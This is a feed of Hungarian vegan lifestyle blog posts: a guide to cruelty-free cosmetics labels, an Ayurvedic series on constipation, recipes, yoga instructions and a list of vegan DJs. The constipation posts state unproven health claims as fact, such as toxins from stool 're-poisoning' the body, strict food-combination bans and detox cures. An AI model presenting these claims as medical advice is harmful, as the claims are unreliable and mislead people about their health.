Nincs CF vagy vegán szimbólum a terméken, de rá van írva, hogy “vegánok számára alkalmas”, “nem támogatjuk az állatkísérleteket”, “100% vegán”, illetve ezek különböző variációi.
Ahogy azt az eltérő szimbólumokkal kapcsolatban már jeleztük, a szöveges állítások sem tekinthetők megbízható minőséggaranciának. Ezeket a szövegeket hivatalos szerv vagy minősítő szervezet szabványainak való megfeleltetés nélkül alkalmazhatja szinte bárki.
MIT TEHETSZ, HA NEM VAGY BIZTOS A TERMÉK CF ÉS/VAGY VEGÁN STÁTUSZÁBAN?
Mint azt élelmiszerek esetében is ajánljuk, nem árt, ha tisztában vagy a kozmetikumokban található összetevőkkel is. Szerencsénkre egy egyszerű Google keresés is eredményre vezethet, de böngészhetsz olyan adatbázisokban is, mint a Skin Deep, valamint számos mobil applikáció is kifejezetten az állati és nem állati eredetű összetevőkkel foglalkozik.
Sajnos elég gyakori a fenti szimbólumok jogtalan használata, így a biztonság kedvéért ellenőrizd, hogy a cég megtalálható-e az adatbázisok valamelyikében.
CF és vegán bloggerek már évek óta keresik a legújabb CF és vegán kozmetikumokat, illetve tartják a kapcsolatot mind a minősítést végző szervezetekkel, mind a gyártókkal, így naprakész információkkal rendelkezhetünk a kozmetikai ipar alakulását illetően.
Keresd fel a cég magyarországi vagy külföldi képviseletét, és kérdezd meg tőlük! A cégek, melyeknek nincs takargatnivalójuk, nem bújnak jól hangzó marketingszövegek mögé, kézséggel válaszolják meg kérdéseidet.
MILYEN KÉRDÉSEKET TEGYEK FEL?
– Tesztelik-e a terméket állatokon az előállítás bármelyik szakaszában?
Fontos különbséget tenni az összetevők, a fejlesztési folyamat és a kész termék tesztelése között, a kész terméket gyakran hirdetik tesztmentesként, ezzel hamis biztonságérzetet keltve a vásárlóban.
– Beszállítóik tesztelik-e az összetevőket állatokon, amennyiben nem, milyen formában bizonyosodnak meg erről?
Sajnos szinte minden összetevőt teszteltek valamikor állatokon, azonban fontos kiszorítani azok felesleges újratesztelését. CF/vegán gyártók kérhetik nyersanyagbeszállítóik írásos nyilatkozatát, miszerint az összetevőket nem tesztelték állatokon.
– Harmadik fél teszteli-e az összetevőket vagy a terméket az előállítás bármelyik szakaszában, amennyiben nem, milyen formában bizonyosodnak meg erről?
Harmadik fél lehet beszállító, független, akár hivatalos szerv által megbízott laboratórium, anyacég vagy más, a gyártóval kapcsolatba hozható cég, amelyek tesztelik a termék összetevőit vagy magát a terméket az előállítás bármelyik szakaszában.
– Másik cég tulajdonában állnak-e?
Egyes minősítő szervezetek akkreditálnak cégeket, melyek állatkísérleteket végző cég tulajdonában állnak.
– Törvény által előírt tesztelésnek alávetik-e termékeiket, forgalmazzák-e termékeiket Kínában, tervezik-e azok forgalmazását Kínában?
Kínában bizonyos esetekben törvény által előírt tesztelésnek kell alávetni a kozmetikumokat. Erről és az európai helyzetről hamarosan bővebben is olvashatsz itt, a Veganinján!
– Megalakulásuktól kezdve nem tesztelnek, vagy van hivatalos dátum, amióta nem folytatnak kísérleteket sem a nyersanyagokon sem a terméken az előállítás bármelyik szakaszában?
Két esetet különböztethetünk meg tesztmentesre való áttérést illetően.
Az egyik az 5 éves szabály, melynek értelmében a kozmetikai célra szánt összetevőket az elmúlt 5 évben nem tesztelték állatokon. Ez persze kibúvót jelenthet azon termékek esetében, melyeknek fejlesztése meghaladja az 5 évet. A másik az ún. cut-off date, hivatalos dátum (ami nem feltétlen publikus). Ezt az eljárásmódot alkalmazó cég vállalja, hogy nem használ fel olyan kozmetikai célra szánt nyersanyagot melyet a záródátum után teszteltek, illetve az azóta előállított terméket sem tesztelték állatokon. Gyakori, hogy egyes összetevőket nem csak kozmetikai célokra használnak fel, ezek állatkísérletek keretében való tesztelésére eltérő szabályok vonatkoznak.
– Amennyiben nem kizárólag vegán termékeket gyártó cégnek írsz, kérd el a vegán termékek listáját!
Valószínű, hogy a listát neked is ellenőrizned kell majd, de megemlítheted melyik gyakran előforduló összetevők nem vegánok.
– Javasolhatod, hogy a jövőben fontolják meg a valamelyik minősítő szervezethez való csatlakozást!
The Vegan Societyhez például.
Előfordulhat, hogy nem kapsz egyből választ kérdéseidre. Légy kitartó, ez nem feltétlen jelenti azt, hogy a cég titkolni akarná, hogy nem tesztmentes vagy vegán.
Ha nem kapsz egyértelmű választ, nyugodtan tegyél fel további kérdéseket és igyekezz infomációval ellátni a céget, kiemelni az együttműködés számukra is előnyös mivoltát, valamint nem támadó stílusban fogalmazni.
Tény, hogy nem egyszerű kiigazodni a különféle CF/vegán minősítéseket illetően. Ennek egyik oka az átfogó jogi szabályozás hiánya, melynek eredményeképpen megjelentek a fenti, sokszor egymásnak is ellentmondó minősítési rendszerek. Ugyanakkor reméljük, ez a rövid összefoglaló segítségedre lesz jövőbeli vásárlásaid alkalmával. Érdemes még indulás előtt utánanézni a kiszemelt cég vagy termék tesztmentes-vegán státuszának, így biztosan nem támogatsz majd olyan céget, amely állatok kizsákmányolásával tesz szert profitra.
Winhoffer Zita
www.v-express.hu
Források:
http://www.choosecrueltyfree.org.au/
http://www.leapingbunny.org/
www.peta.org
http://vegan.org/
http://www.vegansociety.com/
http://elephant-room.org/
http://www.crueltyfreekitty.com/
The post Mi a különbség a Cruelty-free és a Vegán kozmetikumok között? appeared first on VegaNinja.
Székrekedés hatékony kezelése 2. rész - Keltsd életre az emésztésed
2016. február 20. Élj harmóniában
Az előző bejegyzésben részletesen olvashattál a székrekedés kialakulásának okairól (itt olvashatod ) . A mai bejegyzésben pedig arról, hogyan javíthatod az emésztésed és kerülheted el a székrekedést. Nincs más dolgod, mint a tegnapi cikkben felsorolt, székrekedés kialakulásában szerepet játszó tényezőket kiiktatni. A korábbi helytelen táplálkozási és életmódbeli szokásaidat átalakítani:) Keltsd életre az emésztésed, szabadulj meg a székrekedéstől és az emésztési problémáktól Napirend Próbálj rendszert vinni az életedbe. Alakíts ki egy rendszeres napi rutint. Kelj fel korán, és a székletürítést próbáld a reggeli órákra időzíteni. Ne akard erőltetni a dolgot, de hasznos, ha minden reggel elmész a wc-re és néhány percet bent töltesz várva az eredményre. Egy idő után a szervezet elkezdi megszokni a késztetést és be tud állni az emésztésed. A reggeli tisztálkodás után, jöhet a reggeli étkezés. Ezt ne hagyd ki. Meleg, ízletes, tápláló, nedves, picit zsíros-olajos ételt fogyassz reggelire. Az ebédet délben fogyaszd el 12:00 és 13:00 között. Ha lehetséges, mert ilyenkor a legerősebb az emésztés tüze az agni. Ez legyen a nap legtartalmasabb étkezése. A vacsorát lehetőleg este 18:00-19:00 között fogyaszd el. Vacsora csak könnyű ételeket egyél - kerüld az állati fehérjéket - ne fogyassz húst, sajtot, joghurtot, túrót, tojást. Tejet fogyaszthatsz magában vagy édesen gabonával pl. tejbegríz. 22:00 után már ne egyél. A legjobb ha korán legkésőbb este 10 órakor lefekszel aludni. Folyadékfogyasztás Gondoskodj a nap folyamán megfelelő folyadékmennyiségről. Ez segít, hogy a belekben ne száradjon ki a széklet. Semmiképpen ne igyál hideg folyadékot. A szoba-hőmérsékletű italnál melegebb italokat, emésztést segítő gyógyteákat fogyassz rendszeresen a nap folyamán. Hasznos ilyenkor a méregtelenítés, ha csinálsz egy forralt vizes kúrát és méregtelenítesz - részletesen a itt olvashatsz a méregtelenítésről. Táplálkozás Ahhoz, hogy az emésztésed újra megfelelően működjön hasznos, ha olyan ételeket kezdesz fogyasztani, melyek támogatják a megfelelő bélműködést. Kerüld el a száraz ételeket, fogyassz lédús, szaftos, leveses ételeket. Használj emésztést segítő gyógynövényeket, fűszereket, leginkább gyömbért. Fogyassz ájurvédikus Triphala készítményt, amely gyengéden méregteleníti, tisztítja a beleket, enyhe hashajtó hatással rendelkezik. (itt olvashatsz róla) Kerüld el a nehezen emészthető ételeket, a húsokat, a kenyérféléket, a félkész ételeket, konzerveket, finomított liszteket, finomított cukrokat, édességeket, túl zsíros ételeket, sajtokat, túrót. Csökkentsd az erjesztett, ecetes ételek fogyasztását. Ne fogyassz maradék ételeket, melyeket nem frissen készítettél - pl. másnapos étel hűtőből vagy fagyasztott ételek. Ne fogyaszd együtt az alábbi ételpárosításokat: tej-hús, tej-hal, tej-tojás, tej-gyümölcs, tej-sós étel, tej-joghurt, tej-sajt, sajt-gyümölcs. Egyél elegendő mennyiségű rostot. Rostokról egy korábbi bejegyzésben részletesen itt olvashatsz. Építsd be az étrendedbe a teljes értékű gabonákat - hajdina, köles, árpa, quinoa, amarant, barnarizs. Fogyassz sok zöldséget - leginkább párolva, mert nyersen nehezebb megemészteni. Ne egyél túl sok nyers gyümölcsöt sem - a párolt alma és körte is nagyon kedvező. Reggel fogyaszthatsz éjszakára beáztatott mazsolát, datolyát, fügét vagy aszalt szilvát is. A joghurt fogyasztása is kedvező lehet - vízzel hígítva lassziként fogyaszd fűszerekkel. Használj ghí-t (tisztított vajat - az elkészítését itt olvashatod) és tiszta minőségű olívaolajat. N e fogyassz hideg ételeket. Amennyiben ismered ájurvédikus alkatodat, az ájurvédikus típusodnak megfelelő étrendet folytass. Nyugodtan étkezz és étkezés után maradj picit ülve, hogy beinduljon az emésztés. Utána sétálhatsz, segíti a belek mozgását. Étkezés után Soha ne feküdj le teli hassal. Figyelj a tested jelzéseire (teljes cikket itt olvashatod részletesen). Annyit egyél amennyi jól esik és csak akkor ha éhes vagy. Testmozgás Mozogj rendszeresen. Naponta minimum 30 percet szánj mozgásra ez lehet akár tempós séta, torna vagy éppen jóga. Részesítsd előnyben az emésztést serkentő jógagyakorlatokat. Lassíts le Próbálj megszabadulni a rohanástól a stressztől, idegeskedéstől. Meditálj, relaxálj, végezz légző gyakorlatokat, jógázz. Ehhez hosszútávon sokat segíthet ha önismeretre teszel szert és megváltoztatod a gondolkodásodat. Ha pozitívan látod a világot és rugalmas vagy az élet dolgaival szemben, akkor sokkal kevesebb idegeskedésben lesz részed. A következő bejegyzésben a székrekedés ájurvédikus típusok szerinti megközelítéséről olvashatsz.
Székrekedés hatékony kezelése 1. rész - A kiváltó okok
2016. február 19. Élj harmóniában
A székrekedés mai világunkban kényes téma, kevesen beszélnek róla, de nagyon sokakat érint, így gondoltam célszerű itt a blogon is néhány hasznos dolgot leírnom nektek a témában. Fontos, hogy ismerd meg mivel is van dolgod, mi a székrekedés, hogyan alakul ki és mit tehetsz azért, hogy elkerüld. A bejegyzés három részes, a mai első részben a kiváltó okokról, a második részben az általános kezelési elvekről és a harmadik bejegyzésben az ájurvédikus típusoknak megfelelő székrekedés fajtáiról és az egyes típusokhoz kapcsolódó ájurvédikus ajánlásokról írok. Sajnos a legtöbb embernek nagyon rosszak a táplálkozási szokásai. Nem rendszeres, nem megfelelő időkben, túl sokat, túl gyorsan vagy éppen túl idegesen esznek, rossz minőségű ételeket fogyasztanak és általában helytelenül kombinálják az ételféleségeket egymással. Ennek eredményeképpen a szervezet nem tudja megfelelően feldolgozni a bevitt ételeket és rossz emésztés, puffadás, reflux, salakanyagok felhalmozódása, székrekedés, hasmenés lesz az eredmény. A jó emésztés az egészség, az életerő és a jó közérzet alapja. Amikor nem jó az emésztés, az legyengíti a szervezetet és számos betegséghez vezet. Egy ételből annyit hasznosít a szervezet, annyira tud beépülni az étel, a tápanyagok a testedbe, amennyire jó az emésztésed. Rossz emésztésnél a legjobb ételek sem tudnak megfelelően hasznosulni a szervezeted számára. Amikor nem jó az emésztés, nem csak hogy nem hasznosul a bevitt táplálék, de nagyon sok salakanyag halmozódik fel a testben. A fentiek miatt az ájurvéda nagyon nagy hangsúlyt fektet a megfelelő emésztésre. Az ájurvédikus (az ájurvédáról itt olvashatsz) testlakatunknak megfelelően, eltérő emésztéssel rendelkezünk. Pl. a vata típusok hajlamosabbak idegeskedésre, puffadásra, székrekedésre és elég rendszertelenek a táplálkozási szokásaik. A kapha típusoknak is elég gyenge az emésztése, könnyen elnehezülnek, jellemző rájuk a teltségérzet és elég sokáig képesek kibírni étkezés nélkül. A pitta típusok emésztése a legjobb, ők elég könnyen megemésztik a nehezebb ételeket is és inkább hasmenésre, mint székrekedésre hajlamosak, de náluk is előfordulhat székrekedés. A vastagbél nagyon fontos, mert elsődlegesen ő felelős azért, hogy a salakanyagokat el tudjuk távolítani a testünkből. Továbbá a vastagbélben zajlik számos felszívódási folyamat is. A vastagbél egészsége ezért is lényeges. A vastagbél egészségéről a széklet rendszeressége és állapota, valamint a nyelv lepedékessége ad visszajelzést. Az igazán ideális az, amikor ébredés után közvetlenül van székleted és meg tudod a beleket szabadítani a salakanyagoktól. A széklet akkor ideális, ha nem túl folyós, de lágy és formás. Ha nem is sikerül reggel elmenned wc-re, fontos, hogy a nap során kiürítsd a beleidet. Amennyiben nem tudsz naponta legalább egy alkalommal elmenni wc-re és kiüríteni a beleidet , sajnos az már nem egészséges és ezt már székrekedésnek nevezhető. Ilyenkor a székletben felhalmozódott méreganyagok egyfajta módon elkezdenek felszívódni a bélrendszeren keresztül és kvázi visszamérgezik a szervezetet, Amikor a bélmozgás nem tudja megfelelően továbbítani a székletet és elakadás lesz a dolog vége. Az elakadás hatására a széklet elkezd kiszáradni és még nehezebben tud továbbhaladni a bélrendszerben. A székrekedés hatására a széklet puha állaga megváltozik és száraz, kemény vagy akár bogyó jellegű lesz. Sajnos a hashajtás és a beöntés ugyan segít megszabadulni a széklettől, de hosszú távon nagyon legyengítik a beleket, súlyvesztéshez, szívdobogás érzethez, szorongáshoz, szédüléshez, bágyadtsághoz vezethetnek és könnyen hozzá lehet szokni. A székrekedés azt jelzi, hogy a táplálkozási szokásaink helytelenek és a szervezet nem tud megfelelően megszabadulni a méreganyagoktól. Néha nem a helytelen táplálkozási szokások okoznak székrekedést, hanem valamilyen lázas vagy gyulladásos betegség, de ez utóbbiak ritkábban fordulnak elő. Amikor valaki szeretne megszabadulni a székrekedéstől, akkor a kiváltó okokat kell megszüntetni, mert ha tovább folytatjuk helytelen táplálkozási és életmódbeli szokásainkat, sajnos ugyanazt az eredményt kapjuk. A székrekedés kiváltó okai Rendszertelen életmód, rendszertelen étkezések. Szervezetünknek van egy természetes ciklikussága, ami szerint működik. Amikor ezt a ritmust elveszítjük és össze-vissza kezdünk el élni, akkor a normális működés zavarokat szenved el és nem lesz meg az a ritmus amihez tudjon igazodni az emésztésünk. Nem megfelelő alvás. Ahhoz hogy a szervezet, az emésztőrendszer megfelelően tudjon működni elengedhetetlen a megfelelő alvás. Alvás közben szervezetünk regenerálódik és dolgozik azon is, hogy megszabadítsa a testet a tisztátalan lerakódásoktól, méreganyagoktól. Helytelen táplálkozás. V annak olyan ételek melyek egészségessé teszik a testet, jó emésztést biztosítanak és sajnos vannak olyan ételek, melyek rontják az emésztés hatékonyságát, méreganyagokat halmoznak fel a szervezetben és fogyasztásuk székrekedéshez vezet. Ezekről részletesen írtam egy korábbi bejegyzésben itt olvashatod. Helytelen testtartás, kevés testmozgás. Amikor görnyedten tartod magad, azzal összenyomod a beleket és nem tudják megfelelően végezni a munkájukat. Ahányszor csak tudod, húzd ki magad a nap során - ez nem csak az emésztésednek, de a gerincednek és a légzésednek is jót tesz. A mások fontos dolog, amennyiben a test nincs átmozgatva a belekben is létrejön egyfajta pangás. Ezért fontos, hogy rendszeresen végezz testmozgást. Vannak olyan jógapózok, melyek serkentik az emésztést, megszüntetik a székrekedést. Stressz, rohanás. Az állandói rohanás és a sok idegeskedés, a szorongás, félelmek, aggodalmak szintén hozzájárulnak a székrekedéshez, mert hatással vannak az emésztésünkre. A váratlan események, komolyabb változások, utazások szintén hajlamosítanak a puffadásra, székrekedésre. Amennyiben a fenti tényezők hosszabb távon jelen vannak az életedben, akkor az emésztőrendszer belassul, a belek mozgása blokkolódik. Amikor már rendszeresen fennálló székrekedésed van, mindenképpen figyelmet kell szentelned a belek munkájának felfokozására, az emésztésed javítására. Nagyon fontos a régi, rossz szokásaidtól megszabadulni és helyettük új, az emésztésedet támogató szokásokat kialakítani. A következő blogbejegyzésben részletesen olvashatsz az emésztésed javításáról.
Téli gyümölcsös zabkása dióval
Olvastam valahol, hogy a reggeli a testnek, olyan, mint egy repülőrajttal indított nap. Sok ember, amikor végre ki tud kelni az ágyból, rá sem tud nézni a reggelire. Egy gyorsan felhajtott csésze kávé a felnőttek bevett, gyakorlattá vált reggelije. Egyre több gyermek is úgy érkezik az iskolába, hogy még semmit sem evett, vagy ha evett is, legfeljebb fehér cukorban és fehér lisztben gazdag pékárut. Rossz szokások vésődnek be már gyermekkorban is, amelynek következményei kihatnak egészségünkre, életünkre. Cukorbetegség, magas vérnyomás, PCO, hogy csak néhányat említsek azokból a betegségekből, amelyeket már egész fiatalon, akár tinédzser korban vagy korai húszas éveiben "megszerezhet" az ember. Ha reggelizünk is, nem mindegy, hogy mivel indítjuk napunkat, hiszen vagy repülőrajt lesz a szervezet számára, vagy lassú döcögés. Egy helyesen összeállított - gabonában, gyümölcsben és olajos magban gazdag reggeli kicsiket és nagyokat egyaránt segíthet abban, hogy kevésbé legyenek ingerlékenyek, annál inkább energikusak és hatékonyak. Kezdjük a napot néhány friss gyümölccsel, gabonákkal vagy teljes kiőrlésű búzából sütött kenyérrel, és tapasztalni fogjuk, hogy energiaszintünk egész délelőtt a csúcson marad. Ehhez kínálok most egy könnyen megvalósítható ötletet.
A recept:
Hozzávalók:
1 adag zabpehely (pl. 2 marék)
víz
2-3 szem mandarin
2 banán
1 alma
1 kisebb marék dió
Igény esetén: növényi tej
Elkészítés:
Ha apró szemű zabpelyhünk van, akkor a lábosban, amiben főzni fogjuk, kicsit megpirítjuk. Épp, amíg illata lesz a pirítástól. Majd felöntjük vízzel. Figyelve és olykor megkeverve addig főzzük, míg a zabpehely meg puhul. Amint puha, egy banánt beleszeletelünk, átkeverjük.
Ha nagy szemű zabpehellyel dolgozunk, akkor ugyanígy megpiríthatjuk, de egy éjszakára akár be is áztathatjuk hideg vízbe. Másnap pedig felfőzzük. Az ilyen zabpelyhek több főzési időt igényelnek.
Víz helyett és vízzel együtt is használhatunk valamilyen növényi tejet. Külön ízvilágot kölcsönöz reggelinknek.
Amíg fő a zabpehely (elég gyorsan elkészül), a gyümölcsöket megmossuk, megpucoljuk, felaprítjuk. Tálalásnál a zabkása tetejére halmozunk a "gyümölcssalátából", valamint megszórjuk némi dióval.
Jobban édesíteni bizonyára nem szükséges, hiszen a zabkásába is kevertünk egy banánt és a tetejére is került.
Tégy a gerinced egészségéért! - Praszárita padottanászana (szétterpesztett, kinyújtott lábak póza)
2016. február 16. Élj harmóniában
Prasarita padottanászanaA prasarita padottanászana (szétterpesztett, kinyújtott lábak póza ) kiváló a lábak és a hát izomzatának erősítésére és nyújtására. Segít a medencét stabilizálni, így hozzájár ul a helyes testtartáshoz és az egészséges gerinchez. Ez a jógapóz kedvezően befolyásolja az emésztést, energetizálja a hasi szerveket - gyomrot, lépet, májat, beleket. E z egy fordított testhelyzet is, mert a fejed lentebb kerül, mint a törzsed. Ez az ászana f okozza a vérkeringést a fejben és a törzsben is és nagyon jól nyugtatja az idegrendszert és erősíti a szívet. Ha nem tudsz pl. a nyakad miatt vagy menstruáció miatt klasszikus fordított testhelyzeteket csinálni, a prasarita padottanászana jó alternatíva lehet. Hogyan végezd el? - Lépj ki egy széles terpeszbe - a lábfejek legyenek egy vonalban, a lábujjaid előre nézzenek és a lábak középső tengelye legyen párhuzamos egymással - vagy a külső talpélek.. - A két talpadon egyformán oszlasd el a testsúlyt. Majd aktivizáld a lábakat - a külső talpéleket told le jól a matracba, húzd fel a térdkalácsokat és legyenek aktívak a combjaid is. - A medencédet tartsd stabilan - aktív a hasizom, farizom. és nyújtóz z hosszan az egész gerinceddel fölfelé. - Tedd a két kezed a medencédre, majd megőrizve a nyújtózást a gerincben kilégzéssel dönts előre - először csak addig, hogy a törzsed párhuzamos legyen a talajjal, majd tedd a két kezed vállszélességben a talajra - a tenyerek közvetlenül a vállak alá kerüljenek. - Majd a két kezedet helyezd a lábak közé - a kéz és lábujjak egy vonal mentén helyezkedjenek el. - Kilégzéssel hajlítsd a könyökeidet és próbáld a fejed letenni a két kezed közé a talajra. A vállad , könyököd, csuklód egymás fölött helyezkedjen el. Kijövetel a pózból tedd a kezeket a medencédre, majd belégzéssel egyenesedj fel. Ha meg tudod végig tartani a derekad, akkor egyenes törzzsel gyere ki a pózból , ha nem akkor picit hajlítsd a térdeket és gördülj fel csigolyáról , csigolyára. A kitartás alatt stabilan tartsd a lábakat, egyenletesen elosztva a testsúlyt a két lábon és megtartva a térdkalácsokat. Kilégzéssel a külső talpéleket és a nagylábujj tövét told a talajba. B elégzéssel húzd fel a térdkalácsot, tartsd aktívan a combokat. Kilégzéssel próbálj nyújtózni fejtetővel, sz egycsonttal a talaj irányába. A hasadat és medencédet tartsd végig stabilan, húzd be a farokcsontot és nyújtózz az ülőcsontokkal. A lapockáidat simítsd a hátadba és próbáld belégzéssel nyitni a mellkast folyamatosan azáltal, hogy távolítod a két kulcscsontot - úgy dolgozz, ahogy Tádászanában (A tádászanáról itt olvashatsz). Ha nem éred el a talajt egyenes, megtartott derékkal, akkor tegyél a kezeid alá valamit (pl. jógatéglát) alátámasztásnak. Semmi esetre se legyen görbe a derekad. Amennyiben gerincsérved van vagy kezeletlen magas vérnyomásod ne végezd a pózt. Akkor se gyakorold ezt a pózt ha szédülsz, érszűkületed, esetleg érelmeszesedésed van, vagy valami gond van a központi idegrendszereddel. Továbbá fejen található gyulladásoknál se végezz fordított testhelyzetet pl. arcüreggyulladás és szemműtét vagy komoly szemnyomás problémák esetén se .
Mogyorós müzliszelet 3.0
2016. február 13. Éltető ételek
Újabb verzió a müzliszelet készítése során. Próbálom kevésbé zsírosra és édesre készíteni, így ebbe kevesebb olajos mag és méz került. Sőt, ez kifejezetten fehérje bomba lett, mert került bele puffasztott quinoa, zabpehely, kendermag, és még mogyoróvaj is. Ez nem lett olyan kemény, mint az előző verzió, de így is szépen összeállt és szeletelhető is volt. Hozzávalók: - 10 dkg nagyszemű zabpehely - 10 dkg apószemű zabpehely - 3 dkg puffasztott quinoa - 5 dkg kendermag - 5 dkg napraforgómag - 5 dkg mogyoró - 10 dkg dió - 5 dkg mazsola - 5 dkg méz - 5 dkg Rapunzel mogyoróvaj - 5 dkg kókuszvirágcukor - 5 dkg kakaóvaj - 1 kávéskanál vaníliapor - 1 bio narancs reszelt héja Elkészítése: A zabot és az apróra tört olajos magokat (diót, mogyorót, napraforgót), tegyük be a sütőbe. Kb. 130 fokon pirítsuk kb. 15-20 percig.A sütőből kivéve adjuk hozzá a kendermagot, a quinoát és a mazsolát.Közben egy edénybe tegyük bele a mogyoróvajat, a mézet és a kókuszvirágcukrot. Melegítsük össze, majd mehet bele a kakaóvaj is. Nagyon nehezen elegyedik, ebben az esetben vegyük le a tűzről, és öntsünk hozzá egy pici vizet. Gyors keverés, és már kész is az édes krém. Reszeljük bele a narancs héját és szórjuk bele a vaníliaport is.Egy nagyobb tálba tegyük a zabos keveréket, és öntsük rá a mogyoróvajas masszát. gyors mozdulattal keverjük össze, majd egy folpackkal kibélelt jénaiba jó alaposan nyomkodjuk bele. Tegyük be a hűtőbe 1-2 órára, majd szeletelhető is.
Mostanában így eszem:
2016. február 12. Sose mondd, hogy soha
Nem tudom pontosan, mióta, de egy ideje már "tisztán" vagyok. Nem nyersen, de tisztán. Ezt úgy kell érteni, hogy nyersek mellett főtt, sótlan édes burgonyát eszem, ami számomra tiszta kajának érződik és az eddigi legjobb kompromisszumom. Ami az árát illeti: amikor az ember bemegy a sarki kis zöldségesbe és meglátja, hogy 1200/kg, akkor drágának tűnik. De mikor a sparban vagy tescoban megveszek 400 g-ot 350 Ft-ért és ez egy vacsorára bőven elég nekem, akkor tulajdonképpen nem érzem drágának. Semmi olyan tünetem nincs tőle, amit a szokásos főtt ételek szoktak okozni, így hát fejemben tiszteletbeli gyümölcsé lépett elő az édes burgonya. Nagy előnye továbbá, hogy esti salátámhoz már ezt eszem a magokból készült zsíros öntet helyett. (Korábban kesu, később naprafogó tejföl.) Összehasonlíthatatlanul könnyebb érzés, nem beszélve arról, hogy só nélkül is finom! Néha csinálok egy kis adag magtejfölt így is, de csak néha és nem minden nap. A függőségnek vége - pedig hogy örültem neki 1,5 éve és mekkora előrelépés volt akkor, hogy megvan a főttet helyettesítő vacsim és tudok vele paradicsomot enni! Reggelenként a körtés turmix a mindenem, melynek receptjét ez alatt a poszt alatt írtam le. Úgy kívánom ébredéskor, ahogy valaha a kávét kívántam. Sőt, akárcsak a kávéval volt egykor, lefekvéskor már alig várom, hogy reggel legyen és ihassam. Nap közben vagy drága, de isteni szőlővel kényeztetem magam, vagy datolyát eszem uborkával, vagy pedig turmixot ezekből az alapanyagokból: - beáztatott datolya (lehet piacon 650/kg) - banán - mirelitt eper Este pedig 3-4 paradicsom egy fél jégsalátával, és egy fél zacskó rukkolával és főtt sótlan édes burgonya, majd 1-2 óra múlva alvás. Ennyi. Egyszerű, tiszta. Ára attól függ, hol vásárol az ember. Nagybanin majdnem fele az ár, csak fontos, hogy mikor odamész, már tudd pontosan, hogy mit akarsz és mennyi fogy el és milyen gyorsan mennek tönkre az ételek. Most nagyon élvezem ezt az életet és hálás vagyok a sok ups and downs -ért, ami tanított, felkészített, fejlesztett. Minden visszaesés után picit könnyebb volt újra "felülni a lóra", minden alkalommal jobb egy picit. Már nem bánom, hogy nehéz volt és hogy minden kudarcomat "világgá kürtöltem" ezen a blogon, mert egyszer majd segíteni fog másoknak, akik elkezdik.
Vegán techno DJ-k
2016. február 11. Vegán lettem
Egyre több híresség áll vegán mozgalmak élére és tagadja meg a húst. Elektronikus zenei berkeken belül is vannak akik már letették a voksukat a nem ártás mellett. Ők a vegán techno DJ-k!
Ha jártas vagy az elektronikus zenében és szereted a techno különböző szubstílusait, akkor valószínűleg nem kell bemutatnom neked az alábbi neveket. Magyarországon is ismert és közkedvelt művészek és zenészek gondolják úgy, hogy az állatoknak nem kell szenvedniük vagy meghalniuk a kényelmünk, megszokásaink és igényeink miatt. Ezen előadók saját facebook oldalukon belemennek néha nagyon komoly etikai vitákba és nem átalkodnak keményebben is odaszólni pár rosszindulatú radikális húsevőnek. A tapasztalat egyébként az, hogy még ha a többség nem is tud együtt lélegezni az általuk olvasottakkal, mégis nagyon kulturált eszmecsere szokott kialakulni.
Vegán techno DJ
Chris Liebing vegán techno DJ. Sőt, kiadója a CLR égisze alatt tevékenykedő zenészek közül ugyancsak sokan vannak aktív vegánok. Például a Technokunst által több ízben elhozott Tommy Four Seven, vagy az A38-on vendégeskedő Brian Sanhaji és Rebekah, valamint a Magyarországon kevésbé ismert Emerson. Rebekah egyébként az Electronic Beats-en adott már vegán tanácsokat, Liebing a The Traktor Cookery főzőműsorban - ahol rendszerint híres elektronikus zenészek kotyvasztanak – készített piszok jó vegán hamburger tálat, Brian Sanhaji pedig a facebook oldalán vezet egy külön mappát a saját maga által készített vegán kajáknak. A Drumcode vezér Adam Beyerrel folytatom a sort, aki ugyancsak vegán, azonban ő nem megy bele vitákba közösségi oldalán és nem is nagyon reklámozza vegánságát.
Chris Liebing a The Traktor Cookery-ben
A korai hardtechno-s holdudvarból megmaradt és aktív vegán techno DJ-k között is vannak olyanok, akiket számos esetben hallhattatok Magyarországon zenélni az NGOHT jóvoltából többek között. A két legismertebb talán a Pet Duo testvérpáros, akik állatjogi aktivisták vegán szcénán belül, valamint Frank Kvitta aki ugyancsak komoly radikálisnak számít a vegánok között. Frank Kvitta és Chris Liebing facebookon többször adtak már hangot együtt vegánságuknak: “vegan power because we love animals alive”
Vegán techno DJ csajok is vannak. A svéd Ida Engberg – Adam Beyer felesége - is vegán. Született három csodálatos gyerekük, akiket ugyancsak vegánként nevelnek mindenféle probléma nélkül. Ida Engberg nem egyszer posztol vegán tartalmat, beleállva a vitákba. Végül, de nem utolsó sorban itt van Fernanda Martins vegán techno DJ hölgy, aki ugyancsak járt már Magyarországon a Corvin Clubban 2015 májusában.
Adam Beyer és Ida Engberg
Aztán ott van még a nagy öregek közül Josh Wink, aki ugyancsak szószólónak számít vegán körökben. De talán mindegyiknél híresebb vegán elektronikus zenész Moby, aki a KFC ellen egy vicces klipet forgatott a Disco Lies című zenéjéhez, erős mondanivalóval.
Zárásnak ugyan nem vegán techno DJ következik, de mindenképpen ismert elektronikus zenei formáció. Die Antwoord megvan? A duóból Yolandi Visser vegán és híres a nagy balhéiról, melyet akkor ver ki különböző hotelekben, ahol ezt nem veszik komolyan.
Egyébként van Magyarországon vegán techno rajongó csapat, akik mindig nagy lelkesedéssel fogadják a vegán techno DJ -ket. Megkeresik őket előre és készítenek nekik “vegan techno” feliratú pólókat, majd a bulikban odaadják nekik. A képen egyébként Tommy Four Seven látható, az egyik magyar vegan techno-s aktivistával.
Édesburgonya - padlizsán gratin, azaz a csőben sült verzió (gluténmentes, tojásmentes)
2016. február 11. Zöld Avocado
Egy kis technikai szünet után (úgy kezdődött, hogy takarítottam, és úgy végződött, hogy csúnyán lezuhant a laptopom a földre:-( ) újabb, gyorsan elkészíthető, egyszerű, glutén- és tojásmentes, vegánosítható recepttel készültem nektek itt a Zöld Avocado vegetáriánus gasztroblogon. Nem lett olyan szép, mint, amilyen a fejemben volt, de nagyon finom! :-) édesburgonya-padlizsán gratin (tojás- és gluténmentes) A szubtrópusi területeken az egyik legfontosabb népélelmezési cikk az édesburgonya, mely Magyarországon is egyre népszerűbb, és egyre több helyen lehet hozzájutni. Bár az ára még hagy némi kívánnivalót maga után, azért ne ijedjünk meg a burgonya szó hallatán. Közel sincs szükségünk édesburgonyából akkora mennyiségre, mint amihez a hagyományos burgonyavásárláskor szoktunk. Sőt mi több! Valójában az édesburgonya nem is burgonya, és inkább hasonlít a sütőtökhöz, mint a krumplihoz. Fogyaszthatjuk sütve, főzve, készíthetünk belőle töltött burgonyát, rakottakat, krumplipürét, 